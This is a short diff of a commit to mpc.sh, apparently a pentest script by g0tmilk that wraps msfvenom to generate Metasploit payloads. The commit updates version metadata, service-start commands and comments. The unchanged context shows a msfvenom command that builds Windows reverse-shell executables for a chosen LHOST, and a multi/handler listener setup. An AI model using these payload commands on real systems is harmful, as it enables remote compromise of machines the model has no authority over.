|
1 | 1 | #!/bin/bash
|
2 | 2 | #-Metadata----------------------------------------------------#
|
3 |
| -# Filename: mpc.sh (v1.3.2) (Update: 2015-08-17) # |
| 3 | +# Filename: mpc.sh (v1.3.3) (Update: 2015-11-06) # |
4 | 4 | #-Info--------------------------------------------------------#
|
5 | 5 | # Quickly generate Metasploit payloads using msfvenom. #
|
6 | 6 | #-Author(s)---------------------------------------------------#
|
7 | 7 | # g0tmilk ~ https://blog.g0tmi1k.com/ #
|
8 | 8 | #-Operating System--------------------------------------------#
|
9 |
| -# Designed for & tested on: Kali Linux & Metasploit v4.11+ # |
| 9 | +# Designed for & tested on: Kali Linux 2 & Metasploit v4.11+ # |
10 | 10 | #-Licence-----------------------------------------------------#
|
11 | 11 | # MIT License ~ http://opensource.org/licenses/MIT #
|
12 | 12 | #-Notes-------------------------------------------------------#
|
@@ -141,7 +141,7 @@ function doAction {
|
141 | 141 |
|
142 | 142 | cat <<EOF > "${FILEHANDLE}"
|
143 | 143 | #
|
144 |
| -# RUN: service postgresql start;service metasploit start; msfconsole -q -r "${FILENAME}" |
| 144 | +# RUN: systemctl start postgresql; msfdb start; msfconsole -q -r "${FILEHANDLE}" |
145 | 145 | #
|
146 | 146 | use exploit/multi/handler
|
147 | 147 | set PAYLOAD ${PAYLOAD}
|
@@ -715,16 +715,16 @@ elif [[ "${TYPE}" == "windows" || "${TYPE}" == "win" || "${TYPE}" == "exe" ]]; t
|
715 | 715 | CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
|
716 | 716 | doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"
|
717 | 717 |
|
718 |
| -# Batch/Loop modes |
| 718 | +## Batch/Loop modes |
719 | 719 | elif [[ "${BATCH}" == "true" || "${LOOP}" == "true" ]]; then
|
720 | 720 | #SUCCESS=true
|
721 | 721 | exit 0
|
722 | 722 |
|
723 |
| -# Blank input |
| 723 | +## Blank input |
724 | 724 | elif [[ -z "${TYPE}" ]]; then
|
725 | 725 | echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}"
|
726 | 726 |
|
727 |
| -# Unexected input |
| 727 | +## Unexpected input |
728 | 728 | else
|
729 | 729 | echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" >&2
|
730 | 730 | fi
|
|
0 commit comments